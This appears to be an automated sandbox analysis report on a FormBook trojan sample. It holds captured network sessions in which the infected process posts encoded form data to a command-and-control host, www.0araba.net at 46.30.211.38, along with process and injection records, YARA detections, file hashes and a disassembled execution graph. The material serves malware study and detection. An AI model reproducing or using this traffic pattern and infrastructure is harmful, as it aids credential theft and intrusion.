                                                  Data Ascii: wd98XJp=4RKqpUZE3+LQdnIGb2OjbVqXc9ervogyrlpH4d1lHXoouBU+8th652AtrkSZhniP5lNndXR5LrM8/1iR+yCC9bQ3tobxGxTNOe5do1tgEhMivQcgFl/69etBG+NxZ+3i5Sfu1ZzCSGoh2DQdYAWvfFFvmItKxtSLqJWMX4qZJxknYhdDw68SXWL9z6hfxeigKdm2YJBd8laPacEk9+WhDkI=
                                                  Jul 2, 2024 14:09:51.598968983 CEST738INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Tue, 02 Jul 2024 12:09:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 564
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  39192.168.2.44977646.30.211.38801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:53.612956047 CEST10864OUTPOST /s5jh/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.0araba.net
                                                  Origin: http://www.0araba.net
                                                  Referer: http://www.0araba.net/s5jh/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 34 52 4b 71 70 55 5a 45 33 2b 4c 51 64 6e 49 47 62 32 4f 6a 62 56 71 58 63 39 65 72 76 6f 67 79 72 6c 70 48 34 64 31 6c 48 57 51 6f 75 54 63 2b 39 4f 4a 36 36 32 41 74 69 45 53 63 68 6e 6a 50 35 6c 46 5a 64 58 4d 45 4c 75 51 38 2b 57 71 52 71 54 43 43 6b 4c 51 33 6a 34 62 79 49 52 54 59 4f 65 4a 5a 6f 32 56 67 45 68 4d 69 76 54 30 67 47 77 54 36 2f 65 74 41 50 65 4e 74 54 65 33 4f 35 57 7a 55 31 5a 47 2f 53 31 67 68 31 6a 41 64 61 79 2b 76 43 56 46 68 68 49 74 6f 78 74 4f 39 71 49 2b 41 58 37 32 2f 4a 79 34 6e 64 41 67 6d 6a 4c 59 43 4b 51 54 47 6a 4e 64 48 30 70 32 35 47 39 71 68 54 62 6c 34 73 55 4b 47 41 4f 39 41 34 75 54 6e 52 41 33 39 69 64 77 79 48 69 43 76 68 4f 63 36 54 68 34 71 6f 4e 62 50 41 63 54 6f 53 68 52 4a 41 31 5a 7a 57 79 31 39 61 2b 5a 4f 65 58 37 39 79 66 6a 79 66 5a 78 56 33 31 70 66 79 70 67 65 68 4d 41 51 79 2f 4f 50 37 48 48 38 69 2f 65 4b 6f 77 2f 6b 2f 51 45 36 39 75 71 66 66 65 70 76 58 57 75 49 54 75 50 67 46 75 6e 71 62 57 47 39 68 4d 30 57 79 50 [TRUNCATED]
                                                  Data Ascii: wd98XJp=4RKqpUZE3+LQdnIGb2OjbVqXc9ervogyrlpH4d1lHWQouTc+9OJ662AtiESchnjP5lFZdXMELuQ8+WqRqTCCkLQ3j4byIRTYOeJZo2VgEhMivT0gGwT6/etAPeNtTe3O5WzU1ZG/S1gh1jAday+vCVFhhItoxtO9qI+AX72/Jy4ndAgmjLYCKQTGjNdH0p25G9qhTbl4sUKGAO9A4uTnRA39idwyHiCvhOc6Th4qoNbPAcToShRJA1ZzWy19a+ZOeX79yfjyfZxV31pfypgehMAQy/OP7HH8i/eKow/k/QE69uqffepvXWuITuPgFunqbWG9hM0WyPYh2xUuKt4okXqkt2hr8N/OzktZ83HzLSce2nHy+sUaaoCjZ1lZsNhCQd57rl3LnVPNWkmGjIkPKfZQo7EmbIB8t5kvfLUAyY24lomjf4bmH2UpYm3FX4VSgCaivYe+TAimx59DyUFPj00bj8247JlPhjNwebqjkiJmo3jJhuoLvjvW9MBWqEZ9zl/FQve4XiT5mQDDYBpQrOHA+aj2G//UAkRThozkCSI4JuQrA6fDM6EZqkYnfyBUwfSmTBBPvtkYdv6qDv1PVxKGtSoMJgT1Fs4cfmm8WupN0A/Innfr+d5sEflrZGDsbpQFVjIB4YO72KPU4hIx4Jzp+kJREUF17tgqkT7XsEtXuSJEv4hgXjdc+cGL8cyBDOU9jqDlYONYGrZNcJq0X5Ex1mbXslxpux/SxgQEnrdmY2oZcuvpGbHQFXLavT0kaFOBbyh70nkVonJWI+tqB+IMPgs/j4QOrJFryzZIHp98Xp3IDbsHNz19+ieQEkwcvsyYJl16pCAXyPL85priOlmTe4hDP62Dznas5/bx/1Ek3poiWlquBFvHorv9tSPfJCmOXJCXuRXv/3QXuQ+HxV+asSSYn8qLa+jaRSk2/G+OLXmBtzCEPJ73hXrXsKw0qBN3QgsCA9kYKoqMI9mEPL3008zLAteIRbLF0A+At9jj [TRUNCATED]
                                                  Jul 2, 2024 14:09:54.261322975 CEST738INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Tue, 02 Jul 2024 12:09:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 564
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  40192.168.2.44977746.30.211.38801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:56.161942005 CEST497OUTGET /s5jh/?wd98XJp=1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.0araba.net
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:56.790225029 CEST738INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Tue, 02 Jul 2024 12:09:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 564
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:05:54
                                                  Start date:02/07/2024
                                                  Path:C:\Users\user\Desktop\nJ8mJTmMf0.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\nJ8mJTmMf0.exe"
                                                  Imagebase:0x600000
                                                  File size:1'234'944 bytes
                                                  MD5 hash:DD560917FD1166F8F9A3CA565E1C3957
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:08:05:54
                                                  Start date:02/07/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\nJ8mJTmMf0.exe"
                                                  Imagebase:0x6c0000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:08:06:18
                                                  Start date:02/07/2024
                                                  Path:C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe"
                                                  Imagebase:0x800000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:6
                                                  Start time:08:06:20
                                                  Start date:02/07/2024
                                                  Path:C:\Windows\SysWOW64\PresentationHost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\PresentationHost.exe"
                                                  Imagebase:0xba0000
                                                  File size:256'000 bytes
                                                  MD5 hash:C6671F8B9F073785FD617661AD1F1C45
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:7
                                                  Start time:08:06:50
                                                  Start date:02/07/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff6bf500000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:4.1%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:2.9%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:182
                                                    execution_graph 97039 627e93 97040 627e9f __setmbcp 97039->97040 97076 62a048 GetStartupInfoW 97040->97076 97042 627ea4 97078 628dbc GetProcessHeap 97042->97078 97044 627efc 97045 627f07 97044->97045 97161 627fe3 58 API calls 3 library calls 97044->97161 97079 629d26 97045->97079 97048 627f0d 97049 627f18 __RTC_Initialize 97048->97049 97162 627fe3 58 API calls 3 library calls 97048->97162 97100 62d812 97049->97100 97052 627f27 97053 627f33 GetCommandLineW 97052->97053 97163 627fe3 58 API calls 3 library calls 97052->97163 97119 635173 GetEnvironmentStringsW 97053->97119 97057 627f32 97057->97053 97059 627f4d 97060 627f58 97059->97060 97164 6232f5 58 API calls 3 library calls 97059->97164 97129 634fa8 97060->97129 97063 627f5e 97064 627f69 97063->97064 97165 6232f5 58 API calls 3 library calls 97063->97165 97143 62332f 97064->97143 97067 627f71 97068 627f7c __wwincmdln 97067->97068 97166 6232f5 58 API calls 3 library calls 97067->97166 97149 60492e 97068->97149 97071 627f90 97072 627f9f 97071->97072 97167 623598 58 API calls _doexit 97071->97167 97168 623320 58 API calls _doexit 97072->97168 97075 627fa4 __setmbcp 97077 62a05e 97076->97077 97077->97042 97078->97044 97169 6233c7 36 API calls 2 library calls 97079->97169 97081 629d2b 97170 629f7c InitializeCriticalSectionAndSpinCount __getstream 97081->97170 97083 629d30 97084 629d34 97083->97084 97172 629fca TlsAlloc 97083->97172 97171 629d9c 61 API calls 2 library calls 97084->97171 97087 629d39 97087->97048 97088 629d46 97088->97084 97089 629d51 97088->97089 97173 628a15 97089->97173 97092 629d93 97181 629d9c 61 API calls 2 library calls 97092->97181 97095 629d72 97095->97092 97097 629d78 97095->97097 97096 629d98 97096->97048 97180 629c73 58 API calls 4 library calls 97097->97180 97099 629d80 GetCurrentThreadId 97099->97048 97101 62d81e __setmbcp 97100->97101 97193 629e4b 97101->97193 97103 62d825 97104 628a15 __calloc_crt 58 API calls 97103->97104 97105 62d836 97104->97105 97106 62d8a1 GetStartupInfoW 97105->97106 97107 62d841 @_EH4_CallFilterFunc@8 __setmbcp 97105->97107 97113 62d8b6 97106->97113 97116 62d9e5 97106->97116 97107->97052 97108 62daad 97202 62dabd LeaveCriticalSection _doexit 97108->97202 97110 628a15 __calloc_crt 58 API calls 97110->97113 97111 62da32 GetStdHandle 97111->97116 97112 62da45 GetFileType 97112->97116 97113->97110 97114 62d904 97113->97114 97113->97116 97115 62d938 GetFileType 97114->97115 97114->97116 97200 62a06b InitializeCriticalSectionAndSpinCount 97114->97200 97115->97114 97116->97108 97116->97111 97116->97112 97201 62a06b InitializeCriticalSectionAndSpinCount 97116->97201 97120 635184 97119->97120 97121 627f43 97119->97121 97242 628a5d 58 API calls 2 library calls 97120->97242 97125 634d6b GetModuleFileNameW 97121->97125 97123 6351c0 FreeEnvironmentStringsW 97123->97121 97124 6351aa _memmove 97124->97123 97126 634d9f _wparse_cmdline 97125->97126 97128 634ddf _wparse_cmdline 97126->97128 97243 628a5d 58 API calls 2 library calls 97126->97243 97128->97059 97130 634fc1 __NMSG_WRITE 97129->97130 97134 634fb9 97129->97134 97131 628a15 __calloc_crt 58 API calls 97130->97131 97139 634fea __NMSG_WRITE 97131->97139 97132 635041 97133 622f95 _free 58 API calls 97132->97133 97133->97134 97134->97063 97135 628a15 __calloc_crt 58 API calls 97135->97139 97136 635066 97137 622f95 _free 58 API calls 97136->97137 97137->97134 97139->97132 97139->97134 97139->97135 97139->97136 97140 63507d 97139->97140 97244 634857 58 API calls wcstoxq 97139->97244 97245 629006 IsProcessorFeaturePresent 97140->97245 97142 635089 97142->97063 97144 62333b __IsNonwritableInCurrentImage 97143->97144 97268 62a711 97144->97268 97146 623359 __initterm_e 97148 623378 _doexit __IsNonwritableInCurrentImage 97146->97148 97271 622f80 97146->97271 97148->97067 97150 604948 97149->97150 97151 6049e7 97149->97151 97152 604982 IsThemeActive 97150->97152 97151->97071 97306 6235ac 97152->97306 97156 6049ae 97318 604a5b SystemParametersInfoW SystemParametersInfoW 97156->97318 97158 6049ba 97319 603b4c 97158->97319 97160 6049c2 SystemParametersInfoW 97160->97151 97161->97045 97162->97049 97163->97057 97167->97072 97168->97075 97169->97081 97170->97083 97171->97087 97172->97088 97174 628a1c 97173->97174 97176 628a57 97174->97176 97178 628a3a 97174->97178 97182 635446 97174->97182 97176->97092 97179 62a026 TlsSetValue 97176->97179 97178->97174 97178->97176 97190 62a372 Sleep 97178->97190 97179->97095 97180->97099 97181->97096 97183 635451 97182->97183 97187 63546c 97182->97187 97184 63545d 97183->97184 97183->97187 97191 628d68 58 API calls __getptd_noexit 97184->97191 97185 63547c HeapAlloc 97185->97187 97188 635462 97185->97188 97187->97185 97187->97188 97192 6235e1 DecodePointer 97187->97192 97188->97174 97190->97178 97191->97188 97192->97187 97194 629e6f EnterCriticalSection 97193->97194 97195 629e5c 97193->97195 97194->97103 97203 629ed3 97195->97203 97197 629e62 97197->97194 97227 6232f5 58 API calls 3 library calls 97197->97227 97200->97114 97201->97116 97202->97107 97204 629edf __setmbcp 97203->97204 97205 629f00 97204->97205 97206 629ee8 97204->97206 97215 629f21 __setmbcp 97205->97215 97231 628a5d 58 API calls 2 library calls 97205->97231 97228 62a3ab 58 API calls __NMSG_WRITE 97206->97228 97208 629eed 97229 62a408 58 API calls 5 library calls 97208->97229 97211 629f15 97213 629f2b 97211->97213 97214 629f1c 97211->97214 97212 629ef4 97230 6232df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97212->97230 97218 629e4b __lock 58 API calls 97213->97218 97232 628d68 58 API calls __getptd_noexit 97214->97232 97215->97197 97220 629f32 97218->97220 97221 629f57 97220->97221 97222 629f3f 97220->97222 97234 622f95 97221->97234 97233 62a06b InitializeCriticalSectionAndSpinCount 97222->97233 97225 629f4b 97240 629f73 LeaveCriticalSection _doexit 97225->97240 97228->97208 97229->97212 97231->97211 97232->97215 97233->97225 97235 622fc7 __dosmaperr 97234->97235 97236 622f9e RtlFreeHeap 97234->97236 97235->97225 97236->97235 97237 622fb3 97236->97237 97241 628d68 58 API calls __getptd_noexit 97237->97241 97239 622fb9 GetLastError 97239->97235 97240->97215 97241->97239 97242->97124 97243->97128 97244->97139 97246 629011 97245->97246 97251 628e99 97246->97251 97250 62902c 97250->97142 97252 628eb3 _memset __call_reportfault 97251->97252 97253 628ed3 IsDebuggerPresent 97252->97253 97259 62a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97253->97259 97256 628f97 __call_reportfault 97260 62c836 97256->97260 97257 628fba 97258 62a380 GetCurrentProcess TerminateProcess 97257->97258 97258->97250 97259->97256 97261 62c840 IsProcessorFeaturePresent 97260->97261 97262 62c83e 97260->97262 97264 635b5a 97261->97264 97262->97257 97267 635b09 5 API calls 2 library calls 97264->97267 97266 635c3d 97266->97257 97267->97266 97269 62a714 EncodePointer 97268->97269 97269->97269 97270 62a72e 97269->97270 97270->97146 97274 622e84 97271->97274 97273 622f8b 97273->97148 97275 622e90 __setmbcp 97274->97275 97282 623457 97275->97282 97281 622eb7 __setmbcp 97281->97273 97283 629e4b __lock 58 API calls 97282->97283 97284 622e99 97283->97284 97285 622ec8 DecodePointer DecodePointer 97284->97285 97286 622ea5 97285->97286 97287 622ef5 97285->97287 97296 622ec2 97286->97296 97287->97286 97299 6289e4 59 API calls wcstoxq 97287->97299 97289 622f58 EncodePointer EncodePointer 97289->97286 97290 622f2c 97290->97286 97294 622f46 EncodePointer 97290->97294 97301 628aa4 61 API calls 2 library calls 97290->97301 97291 622f07 97291->97289 97291->97290 97300 628aa4 61 API calls 2 library calls 97291->97300 97294->97289 97295 622f40 97295->97286 97295->97294 97302 623460 97296->97302 97299->97291 97300->97290 97301->97295 97305 629fb5 LeaveCriticalSection 97302->97305 97304 622ec7 97304->97281 97305->97304 97307 629e4b __lock 58 API calls 97306->97307 97308 6235b7 DecodePointer EncodePointer 97307->97308 97371 629fb5 LeaveCriticalSection 97308->97371 97310 6049a7 97311 623614 97310->97311 97312 623638 97311->97312 97313 62361e 97311->97313 97312->97156 97313->97312 97372 628d68 58 API calls __getptd_noexit 97313->97372 97315 623628 97373 628ff6 9 API calls wcstoxq 97315->97373 97317 623633 97317->97156 97318->97158 97320 603b59 __write_nolock 97319->97320 97374 6077c7 97320->97374 97324 603b8c IsDebuggerPresent 97325 603b9a 97324->97325 97326 63d4ad MessageBoxA 97324->97326 97327 603c73 97325->97327 97329 63d4c7 97325->97329 97330 603bb7 97325->97330 97326->97329 97328 603c7a SetCurrentDirectoryW 97327->97328 97331 603c87 Mailbox 97328->97331 97598 607373 59 API calls Mailbox 97329->97598 97460 6073e5 97330->97460 97331->97160 97334 63d4d7 97339 63d4ed SetCurrentDirectoryW 97334->97339 97336 603bd5 GetFullPathNameW 97476 607d2c 97336->97476 97338 603c10 97485 610a8d 97338->97485 97339->97331 97342 603c2e 97343 603c38 97342->97343 97599 664c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 97342->97599 97501 603a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97343->97501 97346 63d50a 97346->97343 97349 63d51b 97346->97349 97600 604864 97349->97600 97351 603c55 97520 610b30 97351->97520 97352 603c42 97352->97351 97509 6043db 97352->97509 97353 63d523 97371->97310 97372->97315 97373->97317 97627 620ff6 97374->97627 97376 6077e8 97377 620ff6 Mailbox 59 API calls 97376->97377 97378 603b63 GetCurrentDirectoryW 97377->97378 97379 603778 97378->97379 97380 6077c7 59 API calls 97379->97380 97381 60378e 97380->97381 97665 603d43 97381->97665 97383 6037ac 97384 604864 61 API calls 97383->97384 97385 6037c0 97384->97385 97386 607f41 59 API calls 97385->97386 97387 6037cd 97386->97387 97679 604f3d 97387->97679 97390 63d3ae 97750 6697e5 97390->97750 97391 6037ee Mailbox 97703 6081a7 97391->97703 97395 63d3cd 97397 622f95 _free 58 API calls 97395->97397 97399 63d3da 97397->97399 97401 604faa 84 API calls 97399->97401 97403 63d3e3 97401->97403 97407 603ee2 59 API calls 97403->97407 97404 607f41 59 API calls 97405 60381a 97404->97405 97710 608620 97405->97710 97409 63d3fe 97407->97409 97408 60382c Mailbox 97410 607f41 59 API calls 97408->97410 97411 603ee2 59 API calls 97409->97411 97412 603852 97410->97412 97414 63d41a 97411->97414 97413 608620 69 API calls 97412->97413 97417 603861 Mailbox 97413->97417 97415 604864 61 API calls 97414->97415 97416 63d43f 97415->97416 97418 603ee2 59 API calls 97416->97418 97420 6077c7 59 API calls 97417->97420 97419 63d44b 97418->97419 97421 6081a7 59 API calls 97419->97421 97422 60387f 97420->97422 97423 63d459 97421->97423 97714 603ee2 97422->97714 97425 603ee2 59 API calls 97423->97425 97431 63d468 97425->97431 